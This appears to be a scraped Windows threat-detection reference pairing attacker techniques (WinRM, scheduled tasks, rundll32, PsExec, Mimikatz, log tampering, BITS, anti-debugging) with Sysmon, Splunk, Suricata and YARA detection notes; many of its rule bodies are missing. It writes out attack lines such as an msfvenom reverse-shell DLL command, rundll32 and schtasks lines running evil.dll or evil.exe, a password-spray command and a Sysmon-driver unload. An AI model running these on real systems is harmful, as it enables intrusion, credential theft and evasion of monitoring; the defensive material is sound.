General
WinRM Overview
Windows Remote Management, allows remote system management.
Enabling WinRM
Not enabled by default, requires configuration.
https://docs.microsoft.com/en-us/windows/win32/winrm/installation-and-configuration-for-windows-remote-management
Common Commands
Commands for remote execution.
Enter-PSSession -Computername <IP> -Credentials (Get-Credential)
Invoke-Command -ComputerName 192.168.1.12 -ScriptBlock {get-childitem} -Credential (Get-Credential)
File operations remotely.
$cred = Get-Credential
$session = New-PSSession -ComputerName 192.168.1.12 -Credential $cred
Copy-Item -Path C:\entry.txt -Destination c:\temp\entry.txt -ToSession $session
Detection - Host
Artifacts indicating remote PowerShell execution.
EID 6: Attempt to connect using WinRM.
EID 142: WSMan operation CreateShell failed.
EID 161: WSMan disabled on remote server.
EID 162: Incorrect credentials.
EID 16: Closing WSMan shell.
Detection - Remote
Artifacts indicating remote PowerShell execution on the remote machine.
EID 400: Start of connection, includes HostName, HostApplication, RunspaceId.
EID 403: End of connection, matches RunspaceId in EID 400.
EID 600: Details of remote command execution process.
EID 91: Connection succeeded.
Security Log
Security-related artifacts.
EID 4624 Logon Type 3: Shows source workstation of the connection.
Resources
Additional information on WinRM.
https://docs.microsoft.com/en-us/windows/win32/winrm/portal
WSH (Windows Script Host)
Automation technology for Windows. Supports scripting similar to batch files.
Can be used to execute malicious scripts.
Monitor for unusual script executions or modifications.
Executables (Wscript.exe and Cscript.exe)
Wscript supports GUI, Cscript supports CLI.
Execution of malicious scripts through these executables.
Monitor for unusual activity or command-line arguments in Wscript.exe and Cscript.exe.
VBScript Example
Scripting language supported by WSH.
Set wshShell = CreateObject("WScript.Shell")
strUserName = wshShell.ExpandEnvironmentStrings("%USERNAME%")
...
objShell.run("C:\Users\"& strUserName &"\AppData\Local\Temp\ransomware.exe")
Downloads and executes ransomware.
Use Sysmon to monitor for process creation events involving VBScript files.
JScript Example
Another scripting language supported by WSH.
a = new ActiveXObject('Wscript.Shell');
cmd = "powershell -ep Bypass ...";
a.Run(cmd,0);
Executes a PowerShell command to download and run a payload.
Monitor for JScript files executing PowerShell commands or making network calls.
Sysmon Detection
System monitoring tool for Windows.
-
Configure Sysmon to log process creation with command-line details. Look for instances of Cscript.exe or Wscript.exe executing scripts from unusual locations.
Network Monitoring
Observing network traffic for anomalies.
Detecting network calls to known malicious domains or unusual data transfer patterns.
Use network monitoring tools to watch for outbound connections to suspicious IPs or domains.
File System Monitoring
Monitoring file system for changes.
Detecting creation of new, unexpected executable files.
Implement file integrity monitoring to detect changes in system directories or creation of new executables.
Create Scheduled Task
$InterfaceNumber = 7
$Path = $env:APPDATA + "\Output.pcap"
$Action = New-ScheduledTaskAction -Execute 'C:\Program Files\Wireshark\tshark.exe' -Argument " -i $InterfaceNumber -w $Path -a duration:10"
$Trigger = New-ScheduledTaskTrigger -Once -At "8/26/2019 4:00:00 AM"
$setting = New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DontStopIfGoingOnBatteries
Register-ScheduledTask -Action $Action -Trigger $Trigger -TaskName "Tshark Network Traffic" -Description "Run Tshark" -Settings $setting
PowerShell script to create a scheduled task for running Tshark.
Monitor for PowerShell script executions that register new scheduled tasks.
List Scheduled Tasks
`$Tasks = Get-ScheduledTask -TaskPath \
select TaskName,Actions,Triggers<br>
foreach($task in $Tasks){<br>
$task.TaskName
Out-String<br>
$task.Actions
Create Task on Remote Machine
SCHTASKS /Create /S [Remote Machine Hostname] /U domain\user /P password /SC Daily /Evil /TR c:\evil.exe /ST 18:30
Command to create a scheduled task on a remote machine to execute a potentially malicious file.
Monitor for remote task creation commands, especially those specifying unusual or unknown executables.
Scheduled Task XML File
XML configuration file for a scheduled task.
The XML file is created by the PowerShell script and defines the task settings.
Monitor for creation or modification of XML files in C:\Windows\System32\Tasks
and C:\Windows\Tasks
.
Detection with Sysmon
-
-
Configure Sysmon to log file creation events in the scheduled tasks directories and monitor for process creation events involving cmd.exe
with schtasks.exe
in the command line, or PowerShell executing scheduled task cmdlets.
Create Malicious DLL
msfvenom -p windows/meterpreter/reverse_tcp LHOST=[IP] LPORT=[Port] -f dll -o evil.dll
Using Metasploit's msfvenom to create a reverse TCP meterpreter DLL.
Monitor for the creation of new DLL files, especially those generated by known tools like msfvenom.
Run DLL with Rundll32
rundll32 \\webdavserver\evil.dll,entrypoint
rundll32 C:\evil.dll,EntryPoint
rundll32 shell32.dll,Control_RunDLL C:\evil.dll
Commands to execute a DLL using Rundll32.
Monitor for Rundll32 executions with unusual command-line arguments, especially loading DLLs from suspicious paths.
Run JavaScript with Rundll32
rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";new%20ActiveXObject("WScript.Shell").Run("powershell -c new-item c:\\users\\noname\\desktop\\testrund.txt",0);window.close();
Using Rundll32 to execute JavaScript that runs a PowerShell command.
Monitor for Rundll32 executing JavaScript, especially those that invoke PowerShell or other scripting engines.
Sysmon Detection - Process Creation
-
-
Configure Sysmon to log Rundll32 process creation events, especially with cmd.exe
as the parent process.
Sysmon Detection - Module Loading
-
-
Monitor for Rundll32 loading specific modules like ws2_32.dll
, which could indicate network activity.
Sysmon Detection - Network Connection
-
-
Monitor for network connections initiated by Rundll32 processes.
Sysmon Rule Example
<Sysmon schemaversion="4.00">
<HashAlgorithms>md5,sha256,IMPHASH</HashAlgorithms>
<EventFiltering>
<ProcessCreate onmatch="include">
<Image condition="contains">Rundll32.exe</Image>
</ProcessCreate>
<NetworkConnection>
<Image condition="contains">Rundll32.exe</Image>
</NetworkConnection>
<ImageLoad onmatch="include">
<ImageLoaded condition="contains">ws2_32.dll</ImageLoaded>
</ImageLoad>
</EventFiltering>
</Sysmon>
Example Sysmon rule for monitoring Rundll32 activities.
Implement this Sysmon rule to detect suspicious Rundll32 activities. Note: This rule is for demonstration and should be customized for specific environments.
Discovery
$ nmap -sC -sV 192.168.1.7
Using Nmap to discover services on a target machine, identifying potential services vulnerable to password spraying.
Monitor for multiple, rapid connection attempts or port scans from a single IP address.
Password Spray Attack
./spray.sh -smb 192.168.1.7 users.txt passwords.txt 0 0 WORKGROUP
Executing a password spray attack against SMB service using a list of usernames and passwords.
Monitor for multiple failed login attempts across different user accounts within a short time frame.
Detection with Windows Security Events
source="WinEventLog:Security" earliest=-10m AND EventCode="4625" | stats count(EventCode) by Source_Network_Address,Account_Name | sort - count | where Account_Name != "-"
Using Splunk to search for multiple failed login attempts (Event ID 4625) from the same IP address.
Set up alerts for multiple login failures (Event ID 4625) from the same source IP against different user accounts.
Analyzing Event Patterns
source="WinEventLog:Security" earliest=-10m | stats list(EventCode) as c_list BY Account_Name
Analyzing the sequence of Windows Security Event IDs to detect a pattern of failed logins followed by a success.
Look for patterns where multiple login failures for a user are followed by a successful login, indicating potential account compromise.
PsExec Execution
.\PsExec.exe \\DESKTOP-QTEKH69 -u <username> -p <password> powershell
Command to execute a process remotely using PsExec.
Monitor for PsExec execution patterns, especially with command-line arguments indicating remote execution.
Network Login
-
PsExec authenticates to the target device, creating a network login event.
Monitor for Event ID 4624 with logon type 3, indicating a network login.
File Creation on ADMIN$
-
PsExec connects to ADMIN$ share to drop PSEXESVC.exe
.
Use Sysmon to monitor for file creation events, especially the creation of PSEXESVC.exe
in C:\Windows
.
Service Creation
-
PsExec starts the PSEXESVC
service on the target.
Monitor for Event ID 4697 and registry key creation for new services, particularly PSEXESVC
.
Named Pipe Creation
-
PsExec creates multiple named pipes for communication.
Monitor for the creation of named pipes, especially those containing PSEXESVC
.
Sysmon Detection Rules
<Sysmon schemaversion="4.22">
...
<FileCreate onmatch="include">
<TargetFilename name="PSEXEC" condition="contains">C:\Windows\PSEXESVC.exe</TargetFilename>
</FileCreate>
...
<PipeEvent onmatch="include">
<PipeName name="PSEXEC" condition="contains">PSEXESVC</PipeName>
</PipeEvent>
...
<RegistryEvent onmatch="include">
<TargetObject name="PSEXEC" condition="contains">\SYSTEM\CurrentControlSet\Services\PSEXESVC</TargetObject>
</RegistryEvent>
...</Sysmon>
Example Sysmon rules for monitoring PsExec activities.
Implement these Sysmon rules to detect suspicious PsExec activities.
Suricata Detection Rule
`alert smb any any -> $HOME_NET any (msg: "PSEXEC"; content: "
50 00 53 00 45 00 58 00 45 00 53 00 56 00 43 00 2e 00 65 00 78 00 65 00
" ; sid:22000005;rev:1;)`
Execution of Mimikatz
mimikatz.exe
Invoke-Mimikatz
Invoke-PSImage
Dump the LSASS and send it over network
Various methods to execute Mimikatz, including direct execution, PowerShell scripts, and dumping LSASS process memory.
Monitor for process creation, PowerShell script execution, and LSASS memory dumping activities.
Process Access to LSASS
-
Mimikatz accesses the LSASS process to extract credentials.
Use Sysmon to monitor for unauthorized access to the LSASS process.
Module Loading
-
Mimikatz loads specific modules like vaultcli.dll
and bcryptprimitives.dll
.
Monitor for the loading of these modules, which can indicate credential dumping activities.
Sysmon Detection Rules
<Sysmon schemaversion="4.00">
...
<ProcessAccess onmatch="include">
<SourceImage condition="contains">mimikat</SourceImage>
<TargetImage condition="is">C:\Windows\System32\lsass.exe</TargetImage>
</ProcessAccess>
...
<ImageLoad onmatch="include">
<ImageLoaded condition="contains">vaultcli.dll</ImageLoaded>
<ImageLoaded condition="contains">bcryptprimitives.dll</ImageLoaded>
</ImageLoad>
...</Sysmon>
Example Sysmon rules for monitoring Mimikatz activities.
Implement these Sysmon rules to detect suspicious Mimikatz activities.
PowerShell Logging
-
PowerShell logging can capture script execution, including Mimikatz scripts.
Enable PowerShell script block logging to capture the execution of scripts like Invoke-Mimikatz
.
Dump LSASS using Procdump
-
Using Procdump to dump LSASS process memory, which can then be analyzed by Mimikatz.
Monitor for the execution of Procdump with command-line arguments targeting LSASS.
Invoke-PSImage Detection
-
Detection of Invoke-PSImage, a method to execute PowerShell scripts hidden in images.
Monitor for PowerShell script block logging containing aliases like Sal
and the downloading of .png images from the internet.
Protection Against Password Dumping
-
Microsoft's LSA protection and Credential Guard.
Ensure LSA protection is enabled and Credential Guard is deployed to obfuscate credentials in memory.
VBA Macros
Malicious macros embedded in Office documents.
Monitor registry edits for \Security\Trusted
indicating a user has trusted a document. Use Sysmon to track registry changes.
Dynamic Data Exchange (DDE)
Method enabling Office applications to get data from another application, potentially executing malicious commands.
Monitor Microsoft Office Alerts (OAlerts.evtx) for Event ID 300 indicating execution of unexpected commands.
Object Linking & Embedding (OLE)
Feature allowing the creation of objects in one application and embedding them in another, potentially leading to buffer overflow vulnerabilities.
Monitor process creation where the parent process is in the Microsoft Office directory, indicating potential OLE exploitation.
Detection Techniques
VBA Macros
Clearing Logs
Attackers may clear event logs to cover their tracks.
Monitor for Event IDs 1102 (Security) and 104 (System) which indicate log clearing.
Terminate Event Log Process
Suspending or killing the Event Log process to stop logging.
Monitor for the absence of the Event Log service or unexpected termination of the svchost -k LocalServiceNetworkRestricted -p -s eventlog
process.
Invoke-Phant0m
A PowerShell script used to kill threads responsible for event logging.
Monitor PowerShell logs (Event ID 4104) for script execution patterns matching Invoke-Phant0m.
Mimikatz event::drop
Mimikatz module used to stop logging of specific events like 1102 and 104.
Monitor for process access patterns and module loading indicative of Mimikatz usage.
Detection Techniques
Clearing Logs
Event Log Monitoring:
Look for Event ID 1102 in the Security log and Event ID 104 in the System log.
Command to check logs:
Terminate Event Log Process
Live Analysis:
Check if the Event Log service is running.
Monitor for absence or termination of the
svchost
process associated with the Event Log service.
Invoke-Phant0m
PowerShell Script Block Logging:
Enable Script Block Logging to capture PowerShell script execution.
Look for specific strings or patterns in the script indicative of Invoke-Phant0m.
Mimikatz event::drop
Sysmon Process Access Monitoring:
Monitor for access to the
svchost.exe
process associated with the Event Log service.Sysmon Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for critical events, including process creation and termination, script execution, and registry changes.
Regular Audits: Conduct regular audits of system logs to identify patterns indicative of tampering.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to event logging.
Incident Response Plan: Have an incident response plan in place to address scenarios where event logging is compromised.
Python Payloads
Base64 encoded Python code executed via command line.
Monitor for Python command lines containing Base64 decoding patterns.
PowerShell Payloads
Base64 encoded PowerShell scripts executed via command line.
Monitor for PowerShell command lines with encodedCommand parameters or Base64 decoding patterns.
Detection Techniques
Python Payloads
Sysmon Process Creation Monitoring:
Detect Python command lines with Base64 encoded content.
Sigma Rule:
PowerShell Payloads
Sysmon Process Creation Monitoring:
Detect PowerShell command lines with encodedCommand parameters or Base64 decoding functions.
Sigma Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for command line process creation, especially for PowerShell and Python.
Regular Audits: Conduct regular audits of system logs to identify patterns indicative of Base64 encoded payloads.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious command line activities.
User Education: Educate users about the risks of executing unknown scripts or command lines.
Conhost.exe Misuse
conhost.exe
can be used to launch other executables, potentially bypassing security controls.
Monitor for process creation events where conhost.exe
is the parent image.
Detection Techniques
Conhost.exe Misuse
Sysmon Process Creation Monitoring:
Detect process creation events where
conhost.exe
is the parent image.Sysmon Rule:
Note: This rule is for demonstration purposes. In a production environment, it's important to include all process creation events and exclude only specific, known legitimate processes.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on parent-child process relationships.
Regular Audits: Conduct regular audits of system logs to identify unusual parent-child process relationships involving
conhost.exe
.Threat Hunting: Apply targeted queries to system logs based on specific hypotheses about potential misuse of
conhost.exe
.Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious process execution patterns.
Malicious CHM Files
CHM files can be modified to include JavaScript or VBScript that executes harmful commands, including PowerShell scripts.
Monitor for process creation events involving hh.exe
and subsequent execution of command-line interpreters or PowerShell.
Detection Techniques
Malicious CHM Files
Sysmon Process Creation Monitoring:
Detect
hh.exe
process creation with command lines referring to CHM files.Monitor for subsequent
cmd.exe
or PowerShell process creations withhh.exe
as the parent process.Sysmon Rule:
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, especially focusing on
hh.exe
and its child processes.Regular Audits: Conduct regular audits of system logs to identify unusual process creation patterns involving CHM files.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to CHM file execution.
User Education: Educate users about the risks of opening unknown CHM files and the potential security warnings they should heed.
CMSTP Executing DLLs
Using cmstp.exe
to run malicious DLLs.
Monitor for cmstp.exe
process creation followed by the loading of unusual DLLs.
CMSTP Executing SCT Files
Using cmstp.exe
to execute SCT scriptlets.
Monitor for cmstp.exe
process creation with command lines referencing SCT files.
Privilege Escalation via CMSTP
Misusing cmstp.exe
for privilege escalation.
Monitor for abnormal patterns of cmstp.exe
usage that could indicate privilege escalation attempts.
Detection Techniques
CMSTP Executing DLLs
Sysmon Process Creation and Image Load Monitoring:
Detect
cmstp.exe
process creation events.Monitor for subsequent loading of DLLs, especially from unusual paths.
Sysmon Rule:
CMSTP Executing SCT Files
Sysmon Process Creation Monitoring:
Detect
cmstp.exe
process creation with command lines referencing SCT files.Monitor for network connections or file creations following
cmstp.exe
execution.
Privilege Escalation via CMSTP
Behavioral Analysis:
Monitor for unusual command-line arguments or behaviors associated with
cmstp.exe
.Look for signs of privilege escalation, such as
cmstp.exe
spawning processes with higher privileges.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, image load, and command-line execution.
Regular Audits: Conduct regular audits of system logs to identify unusual patterns involving
cmstp.exe
.Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious activities related to
cmstp.exe
execution.User Education: Educate users about the risks of executing unknown INF or SCT files and the potential security implications.
BITS for Malicious Downloads
Using BITS to stealthily download and execute files.
Monitor for BITS-related activities and analyze BITS job creation events.
Detection Techniques
BITS for Malicious Downloads
Sysmon Process Creation Monitoring:
Detect
bitsadmin.exe
or PowerShell process creation with BITS-related commands.Sysmon Rule:
Event Viewer Monitoring:
Monitor BITS-Client events under
Microsoft-Windows-Bits-Client/Operational
.Look for events showing URL downloads, especially from suspicious or unknown sources.
Network Intrusion Detection Systems (NIDS):
Monitor for network traffic with
Microsoft-Bits
as the User Agent.Analyze traffic patterns that suggest BITS usage for downloading files from external sources.
Analysis of BITS Database:
For Windows versions prior to Windows 10, use
bits_parser
to parseqmgr[0-9].dat
files.For Windows 10, use tools like
ESEDatabaseViewer
to view the BITS database.
PowerShell BITS Transfer Monitoring:
Monitor for PowerShell commands involving
start-BitsTransfer
.Similar to
bitsadmin.exe
, look for BITS job creation and file download activities.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for process creation, BITS activities, and network traffic.
Regular Audits: Conduct regular audits of BITS logs and network traffic to identify unusual download patterns.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious BITS activities.
User Education: Educate users about the risks of unauthorized file downloads and the potential misuse of BITS.
Malicious Use of ADS
Using ADS to hide and execute malicious scripts, DLLs, or executables.
Monitor for file stream creation and execution of files from ADS.
Detection Techniques
Malicious Use of ADS
Sysmon File Stream Creation Monitoring:
Detect creation of alternate data streams, especially for executable file types.
Sysmon Rule:
Note: Exclude known legitimate ADS like
Zone.Identifier
.
Execution Monitoring:
Monitor for execution of files from ADS, such as using
wmic
,wscript
, orrundll32
.Look for command-line patterns that indicate execution from an ADS.
Behavioral Analysis:
Analyze file behavior for signs of ADS usage, especially for files with unusual stream data.
Monitor for tools commonly used to manipulate ADS, like
makecab
andextrac32
.
General Recommendations
Enable Detailed Logging: Ensure that logging is enabled for file creation, especially focusing on alternate data streams.
Regular Audits: Conduct regular audits of system logs to identify unusual file stream activities.
Endpoint Protection: Utilize endpoint protection solutions that can detect and block suspicious file activities related to ADS.
User Education: Educate users about the risks of ADS and the potential for hidden malicious content.
YARA for XOR Detection
YARA is used to identify files or network traffic that contain patterns indicative of XOR encryption, which is often used in malware obfuscation.
xor_detection
rule to identify common XOR patterns.
YARA Rule for XOR Detection
Rule: xor_detection
Purpose:
Detects common XOR encryption patterns in files or network traffic.
YARA Rule:
CAPA for Hook Injection
CAPA rules to detect the setting of global application hooks, often used in hook injection attacks.
set global application hook
and set application hook
rules.
SIGMA for Hook Injection
SIGMA rules to detect instances of hook injection in Windows, based on specific API function calls.
Hook Injection Detection
rule.
YARA for Hook Injection
YARA rules to identify hook injection by looking for specific function calls in binary files.
HookInjection
rule.
Detection Rules
CAPA for Hook Injection
Rule: set global application hook
Scope: Basic block
Features:
API:
user32.SetWindowsHookEx
Number:
0x3 = WM_GETMESSAGE
Number:
0x0 = dwThreadId
Rule: set application hook
Scope: Function
Features:
API:
user32.SetWindowsHookEx
API:
user32.UnhookWindowsHookEx
SIGMA for Hook Injection
Rule: Hook Injection Detection
Description: Detects instances of hook injection in Windows.
Strings:
SetWindowsHookExA
SetWindowsHookExW
UnhookWindowsHookEx
CallNextHookEx
YARA for Hook Injection
Rule: HookInjection
Condition:
Detects use of
SetWindowsHookEx
,UnhookWindowsHookEx
, andCallNextHookEx
functions.Looks for specific patterns in binary files indicating hook function usage.
Implementation and Usage
Scanning Files and Traffic:
Use CAPA, SIGMA, and YARA to scan files or network traffic for the presence of the defined hook injection patterns.
This can be integrated into automated scanning systems or used for manual analysis.
Integration with Security Tools:
These rules can be integrated into various security tools and platforms for real-time monitoring and alerting.
Threat Hunting and Forensics:
Use these rules as part of a broader threat hunting or forensic analysis to identify potentially malicious files or network activities.
YARA for DLL Search Order Hijacking Detection
YARA is used to identify files that contain patterns indicative of DLL Search Order Hijacking, a common technique used in malware and software exploitation.
DLLHijacking
rule to identify specific patterns in DLL files.
YARA Rule for DLL Search Order Hijacking Detection
Rule: DLLHijacking
Purpose:
Detects patterns in DLL files that are commonly associated with DLL Search Order Hijacking.
YARA Rule:
YARA for DLL Export Name Modification Detection
YARA is used to identify files that contain patterns indicative of modifications to DLL export names, a technique used in sophisticated malware and software exploitation.
ModifyDLLExportName
rule to identify specific API function calls in DLL files.
YARA Rule for DLL Export Name Modification Detection
Rule: ModifyDLLExportName
Purpose:
Detects patterns in DLL files that are commonly associated with modifications to DLL export names.
YARA Rule:
YARA for DLL Proxying Detection
YARA is used to identify files that contain patterns indicative of DLL Proxying, a technique used in sophisticated malware for stealth operation and persistence.
DLLProxying
rule to identify specific patterns in DLL files.
YARA Rule for DLL Proxying Detection
Rule: DLLProxying
Purpose:
Detects patterns in DLL files that are commonly associated with DLL Proxying.
YARA Rule:
YARA for Detecting Unloading of Sysmon Driver
YARA is used to identify code patterns indicative of attempts to unload the Sysmon driver, a technique used by malware to evade detection by Sysmon.
fltMC.exe unload SysmonDrv
SysmonEvasion
rule to identify specific API function calls.
Attack Method: Unloading Sysmon Driver
Description
Technique: Malware attempts to unload the Sysmon driver to prevent Sysmon from recording system events.
APIs Used:
GetProcAddress
Attack Code:
Command:
fltMC.exe unload SysmonDrv
Author: Unprotect
YARA Rule for Detecting Unloading of Sysmon Driver
Rule: SysmonEvasion
Purpose:
Detects code patterns associated with attempts to unload the Sysmon driver.
YARA Rule:
YARA for Detecting Shortcut Hiding
YARA is used to identify files that contain patterns indicative of Shortcut Hiding, a technique used by malware to evade detection by embedding malicious code in Windows shortcuts.
Python script for creating a Windows shortcut with an embedded file.
YARA_Detect_ShortcutHiding
rule to identify specific patterns in shortcut files.
Attack Method: Shortcut Hiding
Description
Technique: Embedding malicious code in Windows shortcuts to evade detection by antivirus software.
Attack Code:
Python script to create a Windows shortcut with an embedded file.
Author: Jean-Pierre LESUEUR
Python Script
YARA Rule for Detecting Shortcut Hiding
Rule: YARA_Detect_ShortcutHiding
Purpose:
Detects patterns in Windows shortcut files that are commonly associated with Shortcut Hiding.
YARA Rule:
YARA & CAPA for Detecting NtQueryInformationProcess Anti-Debugging
YARA and CAPA are used to identify code patterns indicative of the use of NtQueryInformationProcess
for anti-debugging, a technique used by malware to evade analysis.
Delphi and C# code snippets to check if a process is being debugged.
YARA and CAPA rules to identify specific patterns related to NtQueryInformationProcess
.
Attack Method: NtQueryInformationProcess for Anti-Debugging
Description
Technique: Using
NtQueryInformationProcess
to detect if the process is currently being debugged.Attack Code:
Delphi and C# examples to check for debugging environment.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
YARA Rule: Detect_NtQueryInformationProcess
Purpose:
Detects the presence of
NtQueryInformationProcess
in code, which is often used for anti-debugging.
YARA Rule:
YARA for Detecting NtSetInformationThread Anti-Debugging
NtSetInformationThread
Used to hide threads from debuggers.
Delphi code snippet to hide a thread from the debugger.
YARA rule to identify specific patterns related to NtSetInformationThread
.
YARA for Detecting NtQueryInformationProcess Anti-Debugging
NtQueryInformationProcess
Retrieves information about a running process to detect if it's being debugged.
Delphi code snippet to check if a process is being debugged.
YARA rule to identify specific patterns related to NtQueryInformationProcess
.
Attack Method: NtSetInformationThread for Anti-Debugging
Description
Technique: Using
NtSetInformationThread
to hide threads from debuggers.Attack Code:
Delphi example to hide a thread from the debugger.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
YARA Rule: Detect_NtSetInformationThread
Purpose:
Detects the presence of
NtSetInformationThread
in code, which is often used for anti-debugging.
YARA Rule:
CAPA for Detecting Unmoving Mouse Cursor
Checking Mouse Activity
Detects if a sandbox environment doesn't have mouse activity.
Delphi code snippet to check for mouse movement.
CAPA rule to identify specific patterns related to the mouse cursor activity.
Attack Method: Checking Mouse Activity for Sandbox Evasion
Description
Technique: Some sandboxes lack mouse movement or a lively desktop background, so malware checks for mouse activity to evade detection.
Attack Code:
Delphi example to check for mouse movement.
Author: Jean-Pierre LESUEUR
Delphi Code Snippet
Detection Rules
CAPA Rule: Detect Unmoving Mouse Cursor
Purpose:
Detects the presence of specific patterns in code related to checking mouse activity, a common sandbox evasion technique.
CAPA Rule:
References
Last updated